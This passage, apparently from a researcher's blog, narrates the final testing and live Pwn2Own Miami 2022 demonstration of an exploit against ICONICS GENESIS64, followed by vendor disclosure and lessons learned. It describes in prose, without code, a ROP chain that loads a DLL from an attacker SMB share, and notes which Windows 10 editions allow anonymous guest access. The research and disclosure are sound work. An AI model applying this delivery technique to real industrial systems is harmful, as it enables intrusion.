The VM was ready, I threw the exploit at it, excited as always, and... nothing. That was unexpected, but it wasn't 100% reliable either, so I ran it more times. But nothing. Wow, what the heck? It felt pretty uncomfortable, and my brain started to run far with impostor syndrome. I asked myself "Did you actually find a real vulnerability?" or "Had you set up the target with a non-default configuration?". Looking back on it, it is pretty funny, but oh boy, I wasn't laughing at the time.
I installed my debugging tools inside the target and threw the exploit on the operating table. I verified that I was triggering the memory corruption, and that my ROP chain was actually getting executed. What a relief. Maybe I do understand computers a little bit, I thought.
Stepping through the ROP chain, it was clear that LoadLibraryExW was getting executed, and that it was reaching out to my SMB server. It didn't seem to ask to be served the DLL I wanted it to load though. Googling the error code, I realized something that I didn't know, and that could be a deal breaker. Windows 10, by default, prevents the default SMB client library from connecting anonymously to an SMB share. Basically, the vector that I was using to deliver the final payload was blocked on the latest version of Windows. Wow, I didn't see this coming, and I felt pretty grateful to have set up a new environment and run into this case.
What was stressing me out, though, was that I needed to find another way to deliver the payload. I didn't see other quick ways to do that because of ASLR, and the imports of GenBroker64.exe. I had potential ideas, but they would have required me to be able to store a much larger ROP chain. But I didn't have that space. What was bizarre, though, was the fact that my other VM was also Windows 10, and it was working fine. It could have been that it wasn't quite the latest Windows 10, or that somehow I had turned guest access back on while installing some tool.
I eventually landed on this page, I believe: Guest access in SMB2 and SMB3 disabled by default in Windows. According to it, Windows 10 Enterprise edition turns it off by default, but Windows 10 Pro edition doesn't. So supposedly everything would be back to working if I installed a Windows 10 Pro edition..? I reimaged my VM with a Professional version, and this time, the exploit worked as expected; phew, I dodged a bullet on this one. I really didn't want to throw away all the work I had done with the ROP chain, and I wasn't motivated to find and assemble new puzzle pieces.
I was finally.... ready. I was extremely nervous but also super excited. I worked hard on that project; it was time to collect some dividends and have fun.
I didn't want to burn too many vacation days, so I caught a red-eye flight from Seattle to Miami International Airport on the first day of the competition.

I landed at 7AM ish, grabbed a taxi from the airport and headed to my hotel in Miami Beach, close to The Fillmore Miami Beach (the venue).

I watched the draw online and was scheduled to go on the first day of the contest, on April 19th, at 2 p.m. local time. I worked the morning and took my afternoon off to attend the competition.

I showed up at the conference venue but didn't see any Pwn2Own posters or anything. Security guards were checking the attendees' badges, so I couldn't get in. I looked around the building for another entrance and checked my phone to see if I had missed something, but nothing. I returned to the main entrance to ask the security guards if they knew where Pwn2Own was happening. This was hilarious because they had no clue what this was. I asked "Do you know where the Pwn2Own competition is happening?", the guy answered "Hmm no I never heard about this. Let me ask my colleague" and started talking to his buddy through the earpiece. "Yo Mitch, do you know anything about a ... own to pown, or an own to own competition..?". Boy, I was standing there, laughing hard inside. After a few exchanges, they decided to grab somebody from the organization, and that person let me in and made me a badge: Pown 2Own. Epic.

I entered the competition area, a medium-sized room with a few tables, the stage, and people hanging out. It was reasonably dark, and the light gave it a nice hacker ambiance. I hung out in the room, observing what people were up to. Journalists coming in and out, competitors discussing the schedule, etc.
The clock was ticking, and my turn was coming up pretty fast. I was worried that I wouldn't have time to set up and verify the configuration of the official target. I tried to make my presence known to the organizers, but I don't think they noticed. About 15 minutes before my turn, one of the organizers found me, and we went on the stage to set things up. I pulled out my laptop, plugged in an ethernet cable that connected me to the target laptop, and configured a static IP. I chose the same IP I used during my testing to ensure I didn't have a longer IP address, which would require a longer string and could make me run out of space in my ROP chain. I tried pinging the target IP, but it wasn't answering. I began to check if my firewall was on or if I had mistyped something, but nothing worked. At this point, we decided to switch the ethernet cable as it was probably the problem. The clock was ticking, and we were about 5 minutes from show time but nothing was working yet.
I was getting nervous as I wanted to verify a few things on the target laptop to ensure it was properly configured. I ran through my checklist while somebody was looking for a new ethernet cable. I checked the remote software version, the target IP, and that GenBroker64.exe was an x64 binary. One of the organizers handed me a cable, so I hooked it up. The Pwn2Own host started to go live and I could hear him introducing my entry. After a few seconds, he came over and asked if we were ready.. to which I nervously answered yes, when in fact, I wasn't ready. I had two minutes left to verify connectivity with the target and make sure the target could browse an SMB share I opened to ensure my payload would be delivered just fine. The target could browse my share, and I was finally able to ping the target right on time to go live.
I felt stressed out and had a hard time typing the command line to invoke my exploit. I was worried I would mistype the IP address or something silly like that. I pressed enter to launch it... and immediately saw the calculator popping as well as the background wallpaper changing. I was stunned. I just could not believe that it landed. To this day, I am still shocked that it worked out. I am not even sure I cracked a smile. People clapped, I closed my laptop and stood up, feeling the adrenaline rush through my legs. Powerful.
I followed one of the event organizers to the disclosure room, where ZDI verified that the vulnerability wasn't known to them. They looked on their laptop for a minute or two and said that they didn't know about it. Awesome. The second stage happens with the vendor. An employee of ICONICS entered the room, and I described to them the vulnerability and the exploit at a high level. They also said they didn't know about this bug, so I had officially won.
I shook hands with the organizers and returned to my hotel with a big ass smile on my face. I actually couldn't stop smiling like a dummy. I dropped my laptop there and decided to take the next day off to reward myself. I returned to the venue and hung out in the room to attend the other entries for the day. This is where I eventually ran into Steven Seeley and Chris Anastasio. Those guys were planning to demonstrate 5 different exploits, which seemed insane to me. It put things into perspective and made me feel like I had a lot to learn, which was exciting. On top of killing it at the competition, they were also extremely friendly and let me know that they were setting up a dinner with other participants. I was definitely game to join them and meet up with folks.
We met at a restaurant in Miami Beach and I met the Flashback team (Pedro & Radek), Sharon & Uri from the Claroty Research team, and Daan & Thijs from Computest Sector7. Honestly, it felt amazing to meet fellow researchers and learn from them. It was super interesting to hear people's backgrounds, how they approached the competition, and how they looked for bugs.

I spent the next two days hanging out, cheering for the competitors in the Pwn2Own room, grabbing celebratory drinks, and having a good time. Oh and of course, I grabbed oversized Pwn2Own Miami swag shirts. Steven & Chris owned so many targets with a first-blood that they won many laptops. Out of kindness, they offered me one as a present, which I was super grateful for. It has been a great memento for me, so a big thank you to them.

I packed my bag, grabbed a taxi, headed to the airport, and flew back home with lifelong memories.
Wrapping up
In this post I tried to walk you through the ups and downs of vulnerability research. I want to thank the ZDI folks for both organizing such a fun competition and rooting for participants. Also, special thanks to all the contestants for being inspiring and for their kindness.
I think there are some good lessons that I learned that might be useful for some of you out there:
- Don't under-estimate what tooling can do when aimed at the right things. I initially didn't want to use fuzzing as I was interested in code-review only. In the end, my quick fuzzing campaign highlighted something that I missed and that area ended up being juicy.
- Focus on understanding the target. In the end, it facilitates both bug finding and exploitation.
- Try to focus on solving problems one by one. Trying to visualize all the steps you have to go through to make something work can feel overwhelming. Ironically, for me it usually leads to analysis paralysis which completely halts progress.
- Don't skip attack surface enumeration. Somehow it isn't super fun to me, and I always regret not spending enough time doing it.
- Testing isn't fun but it is worth being thorough when the stakes are high. It would have been heartbreaking for my entry to fail for an issue that I could have caught by doing proper testing.
If you want to take a look, the code of my exploit is available on GitHub: Paracosme. If you are interested in reading other write-ups from Pwn2Own Miami 2022, here is a list:
- Pwn2Own Miami 2022: Unified Automation C++ Demo Server DoS
- Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass
- Pwn2Own Miami 2022: Inductive Automation Ignition Remote Code Execution
- Pwn2Own Miami 2022: AVEVA Edge Arbitrary Code Execution
- Pwn2Own Miami 2022: ICONICS GENESIS64 Arbitrary Code Execution
- Two lines of Jscript for $20,000
Special thank you to my boiz yrp604 and __x86 for proofreading this article.
Last but not least, come hang out on Diary of reverse-engineering's Discord server with us!